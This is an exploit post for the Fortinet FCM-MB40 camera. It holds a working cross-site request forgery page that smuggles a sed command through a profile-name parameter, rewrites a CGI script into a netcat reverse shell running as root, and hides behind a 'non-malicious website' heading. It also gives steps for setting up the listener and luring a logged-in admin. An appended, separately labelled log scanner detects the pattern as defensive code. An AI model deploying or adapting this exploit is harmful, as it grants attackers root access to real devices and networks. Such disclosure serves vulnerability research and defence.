Fortinet FCM-MB40 - Cross-Site Request Forgery / Remote Command Execution

# Exploit Title: FCM-MB40 Remote Command Execution as Root via CSRF
# Date: 2019-06-19
# Exploit Author: @XORcat
# Vendor Homepage: https://fortinet.com/
# Software Link: Customer Account Required
# Version: v1.2.0.0
# Tested on: Linux
# CVE : TBA

<html>
    <!-- FCM-MB40 CSRF to RCE as root, by Aaron Blair (@xorcat) 

Full details: https://xor.cat/2019/06/19/fortinet-forticam-vulns/

Follow the following steps to demonstrate this PoC:

1. Replace IP addresses in Javascript code to represent your testing
   environment.
2. Launch a `netcat` listener on the attacker's host using `nc -nvlp
   1337`
3. Ensure the "admin" user's browser is logged in to the FCM-MB40.
   * Note: all modern browsers will cache Basic Authentication
     credentials (such as those used by the FCM-MB40) even if the
     FCM-MB40's administration page is closed.
4. Open the crafted HTML document using the "admin" user's
   browser.
   * Note: In an attack scenario, this step would be performed by
     implanting the code into a legitimate webpage that the "admin"
     user visits, or by tricking the "admin" user into opening a page
     which includes the code.
5. Note that the `netcat` listener established in step 2. has received
   a connection from the camera, and that it is presenting a `/bin/sh`
   session as root.
   * Note: type `id` in the `netcat` connection to verify this.

_Note: After this issue has been exploited, the state of the system will
have changed, and future exploitation attempts may require
modification._
-->
    <head>
        <script>
const sleep = (milliseconds) => {
    return new Promise(resolve => setTimeout(resolve, milliseconds))
};
var sed_url = 'http://192.168.1.20/cgi-bin/camctrl_save_profile.cgi?num=9&name=a%20-e%20s/^if.*/nc\\t192.168.1.10\\t1337\\t-e\\t\\/bin\\/sh\\nexit/%20../cgi-bin/ddns.cgi%20&save=profile';
var execute_url = 'http://192.168.1.20/cgi-bin/ddns.cgi';

var sed_img = document.createElement("img");
sed_img.src = sed_url;

sleep(400).then(() => {
    var execute_img = document.createElement("img");
    execute_img.src = execute_url;
});
        </script>
    </head>
    <body>
        <h1>Welcome to my non-malicious website.</h1>
    </body>
</html>
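
A defender-side check for the request pattern in this PoC, as an added example that is not part of the original post or of any Fortinet code: it scans web access logs for requests to the two CGI endpoints that arrive with a missing or foreign Referer, or with a profile `name` outside a strict allowlist. The combined log format, the reverse proxy producing it, `CAMERA_HOST`, the `SAFE_NAME` allowlist and the sample log lines are all assumptions made for illustration.

```javascript
// Added example (not from the original post). Assumptions: a reverse proxy in
// front of the camera writes combined-format access logs; CAMERA_HOST and the
// SAFE_NAME allowlist for profile names are illustrative choices.
const CAMERA_HOST = '192.168.1.20';
const WATCHED = ['/cgi-bin/camctrl_save_profile.cgi', '/cgi-bin/ddns.cgi'];
const SAFE_NAME = /^[A-Za-z0-9_-]{1,32}$/;
const LOG_RE = /^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)"/;

// Constructed sample log lines (not captured traffic).
const SAMPLE_LOG = [
  '192.168.1.50 - admin [19/Jun/2019:10:00:00 +0000] "GET /cgi-bin/camctrl_save_profile.cgi?num=1&name=Lobby_day&save=profile HTTP/1.1" 200 120 "http://192.168.1.20/setup.html" "Mozilla/5.0"',
  '192.168.1.50 - admin [19/Jun/2019:10:05:00 +0000] "GET /cgi-bin/camctrl_save_profile.cgi?num=9&name=a%20-e%20s/x/y/%20../cgi-bin/ddns.cgi%20&save=profile HTTP/1.1" 200 120 "http://example.test/page.html" "Mozilla/5.0"',
  '192.168.1.50 - admin [19/Jun/2019:10:05:01 +0000] "GET /cgi-bin/ddns.cgi HTTP/1.1" 200 64 "http://example.test/page.html" "Mozilla/5.0"',
];

// Returns a finding for one log line, or null if nothing stands out.
function analyzeLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  const [, client, user, , target, , referer] = m;
  let url;
  try { url = new URL(target, `http://${CAMERA_HOST}`); } catch { return null; }
  if (!WATCHED.includes(url.pathname)) return null;
  const reasons = [];
  // A Referer that is absent or names another host means the request did not
  // originate from the camera's own administration pages.
  let refHost = null;
  try { refHost = new URL(referer).host; } catch { /* "-" or malformed */ }
  if (refHost !== CAMERA_HOST) reasons.push('cross-site-or-missing-referer');
  // searchParams.get() percent-decodes, so encoded spaces, slashes and "../"
  // in the profile name are tested against the allowlist in decoded form.
  const name = url.searchParams.get('name');
  if (name !== null && !SAFE_NAME.test(name)) reasons.push('unsafe-profile-name');
  return reasons.length ? { client, user, path: url.pathname, reasons } : null;
}

// Runs the check over many lines and keeps only the findings.
function scan(lines) {
  return lines.map(analyzeLine).filter((f) => f !== null);
}

console.log(scan(SAMPLE_LOG));
```

A request typed directly into the address bar also carries no Referer, so the first reason is a lead to correlate with the second rather than proof on its own.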
            
